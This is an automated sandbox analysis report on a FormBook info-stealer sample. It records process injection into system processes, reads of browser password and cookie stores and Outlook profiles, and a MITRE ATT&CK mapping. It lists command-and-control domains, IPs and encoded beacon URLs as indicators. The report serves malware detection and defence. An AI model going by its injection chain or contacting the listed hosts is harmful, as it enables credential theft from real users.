Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtOpenFile: Direct from: 0x77462DCC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtQueryInformationToken: Direct from: 0x77462CAC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtTerminateThread: Direct from: 0x77462FCC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtAllocateVirtualMemory: Direct from: 0x77462BEC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtOpenKeyEx: Direct from: 0x77462B9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\mobsync.exe

Thread register set: target process: 2500

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\mobsync.exe

Thread APC queued: target process: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D3B008

Jump to behavior

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_006287B1 LogonUserW,

0_2_006287B1

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_005D3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_005D3B3A

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_005D48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_005D48D7

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_00634C7F mouse_event,

0_2_00634C7F

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\M7XS5C07kV.exe"	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_00627CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00627CAF

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_0062874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0062874B

Source: M7XS5C07kV.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: M7XS5C07kV.exe, JqFbrQRYIbA.exe, 00000004.00000002.3297302930.0000000001940000.00000002.00000001.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000004.00000000.1604702171.0000000001941000.00000002.00000001.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3298145044.0000000000C50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: JqFbrQRYIbA.exe, 00000004.00000002.3297302930.0000000001940000.00000002.00000001.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000004.00000000.1604702171.0000000001941000.00000002.00000001.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3298145044.0000000000C50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: JqFbrQRYIbA.exe, 00000004.00000002.3297302930.0000000001940000.00000002.00000001.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000004.00000000.1604702171.0000000001941000.00000002.00000001.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3298145044.0000000000C50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: JqFbrQRYIbA.exe, 00000004.00000002.3297302930.0000000001940000.00000002.00000001.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000004.00000000.1604702171.0000000001941000.00000002.00000001.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3298145044.0000000000C50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_005F862B cpuid

0_2_005F862B

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_00604E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00604E87

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_00611E06 GetUserNameW,

0_2_00611E06

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_00603F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00603F3A

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_005D49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_005D49A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3300816355.00000000049C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3296540364.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3295915751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3296328965.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1689038879.0000000005A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1687870269.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1685947198.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3298177839.0000000004F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\mobsync.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: M7XS5C07kV.exe	Binary or memory string: WIN_81
Source: M7XS5C07kV.exe	Binary or memory string: WIN_XP
Source: M7XS5C07kV.exe	Binary or memory string: WIN_XPe
Source: M7XS5C07kV.exe	Binary or memory string: WIN_VISTA
Source: M7XS5C07kV.exe	Binary or memory string: WIN_7
Source: M7XS5C07kV.exe	Binary or memory string: WIN_8
Source: M7XS5C07kV.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3300816355.00000000049C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3296540364.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3295915751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3296328965.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1689038879.0000000005A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1687870269.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1685947198.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3298177839.0000000004F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00646283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00646283
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00646747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00646747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	5 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
M7XS5C07kV.exe	58%	Virustotal		Browse
M7XS5C07kV.exe	91%	ReversingLabs	Win32.Trojan.AutoitInject
M7XS5C07kV.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.canadavinreport.site/g3h7/?2nI=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&knE=vl8DPVdxl	0%	Avira URL Cloud	safe
http://www.canadavinreport.site/g3h7/	0%	Avira URL Cloud	safe
http://aballanet.cat/6xrr/?2nI=HxJAUmNG5a	100%	Avira URL Cloud	malware
http://www.zkdamdjj.shop	0%	Avira URL Cloud	safe
http://www.madhf.tech/0mwe/?2nI=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&knE=vl8DPVdxl	0%	Avira URL Cloud	safe
http://www.zkdamdjj.shop/kf1m/?2nI=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&knE=vl8DPVdxl	0%	Avira URL Cloud	safe
http://www.laohub10.net/36be/?knE=vl8DPVdxl&2nI=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q==	0%	Avira URL Cloud	safe
http://www.aballanet.cat/6xrr/?2nI=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&knE=vl8DPVdxl	100%	Avira URL Cloud	malware
http://www.litespeedtech.com/error-page	0%	Avira URL Cloud	safe
http://www.izmirescortg.xyz/lnl7/?knE=vl8DPVdxl&2nI=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==	0%	Avira URL Cloud	safe
http://www.logidant.xyz/iuvu/	0%	Avira URL Cloud	safe
http://www.yunlekeji.top/t322/?2nI=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg==&knE=vl8DPVdxl	0%	Avira URL Cloud	safe
http://www.madhf.tech/0mwe/	0%	Avira URL Cloud	safe
http://www.logidant.xyz/iuvu/?2nI=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&knE=vl8DPVdxl	0%	Avira URL Cloud	safe
http://www.canadavinreport.site/g3h7/?2nI=dyqW	0%	Avira URL Cloud	safe
http://www.laohub10.net/36be/	0%	Avira URL Cloud	safe
http://www.zkdamdjj.shop/kf1m/	0%	Avira URL Cloud	safe
http://www.madhf.tech/0mwe/?2nI=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5h	0%	Avira URL Cloud	safe
http://www.aballanet.cat/6xrr/	100%	Avira URL Cloud	malware
http://www.yunlekeji.top/t322/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.izmirescortg.xyz	172.67.186.192	true	false	high
www.madhf.tech	103.224.182.242	true	false	high
fap-a13f5c64.faipod.com	165.154.96.210	true	true	unknown
r0lqcud7.nbnnn.xyz	202.79.161.151	true	false	high
logidant.xyz	45.141.156.114	true	true	unknown
www.zkdamdjj.shop	188.114.96.3	true	false	high
www.canadavinreport.site	185.27.134.206	true	false	high
aballanet.cat	134.0.14.158	true	false	unknown
www.logidant.xyz	unknown	unknown	true	unknown
www.laohub10.net	unknown	unknown	false	high
www.aballanet.cat	unknown	unknown	false	unknown
www.yunlekeji.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.canadavinreport.site/g3h7/?2nI=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&knE=vl8DPVdxl	false	Avira URL Cloud: safe	unknown
http://www.madhf.tech/0mwe/?2nI=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&knE=vl8DPVdxl	false	Avira URL Cloud: safe	unknown
http://www.canadavinreport.site/g3h7/	false	Avira URL Cloud: safe	unknown
http://www.laohub10.net/36be/?knE=vl8DPVdxl&2nI=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q==	false	Avira URL Cloud: safe	unknown
http://www.zkdamdjj.shop/kf1m/?2nI=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&knE=vl8DPVdxl	false	Avira URL Cloud: safe	unknown
http://www.izmirescortg.xyz/lnl7/?knE=vl8DPVdxl&2nI=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==	false	Avira URL Cloud: safe	unknown
http://www.aballanet.cat/6xrr/?2nI=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&knE=vl8DPVdxl	false	Avira URL Cloud: malware	unknown
http://www.yunlekeji.top/t322/?2nI=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg==&knE=vl8DPVdxl	true	Avira URL Cloud: safe	unknown
http://www.logidant.xyz/iuvu/	false	Avira URL Cloud: safe	unknown
http://www.zkdamdjj.shop/kf1m/	false	Avira URL Cloud: safe	unknown
http://www.aballanet.cat/6xrr/	false	Avira URL Cloud: malware	unknown
http://www.laohub10.net/36be/	false	Avira URL Cloud: safe	unknown
http://www.logidant.xyz/iuvu/?2nI=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&knE=vl8DPVdxl	false	Avira URL Cloud: safe	unknown
http://www.madhf.tech/0mwe/	false	Avira URL Cloud: safe	unknown
http://www.yunlekeji.top/t322/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aballanet.cat/6xrr/?2nI=HxJAUmNG5a	mobsync.exe, 00000005.00000002.3299870196.0000000004F56000.00000004.10000000.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3298979435.0000000002B06000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.zkdamdjj.shop	JqFbrQRYIbA.exe, 00000006.00000002.3300816355.0000000004A25000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.litespeedtech.com/error-page	mobsync.exe, 00000005.00000002.3299870196.0000000004DC4000.00000004.10000000.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3298979435.0000000002974000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1982761385.0000000006C24000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.canadavinreport.site/g3h7/?2nI=dyqW	mobsync.exe, 00000005.00000002.3301333103.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3298979435.0000000002E2A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.madhf.tech/0mwe/?2nI=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5h	JqFbrQRYIbA.exe, 00000006.00000002.3298979435.0000000002C98000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.141.156.114	logidant.xyz	Germany	30860	YURTEH-ASUA	true
165.154.96.210	fap-a13f5c64.faipod.com	Canada	7456	INTERHOPCA	true
188.114.96.3	www.zkdamdjj.shop	European Union	13335	CLOUDFLARENETUS	false
103.224.182.242	www.madhf.tech	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	false
185.27.134.206	www.canadavinreport.site	United Kingdom	34119	WILDCARD-ASWildcardUKLimitedGB	false
172.67.186.192	www.izmirescortg.xyz	United States	13335	CLOUDFLARENETUS	false
134.0.14.158	aballanet.cat	Spain	197712	CDMONsistemescdmoncomES	false
202.79.161.151	r0lqcud7.nbnnn.xyz	Singapore	64050	BCPL-SGBGPNETGlobalASNSG	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588208
Start date and time:	2025-01-10 22:47:43 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	M7XS5C07kV.exe renamed because original name is a hash value
Original Sample Name:	0dbe28ff5ab9cae26e7bc59f61fa8641b6b9675cd8276b5f40930ff14d685400.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@9/8
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 92% Number of executed functions: 60 Number of non-executed functions: 269
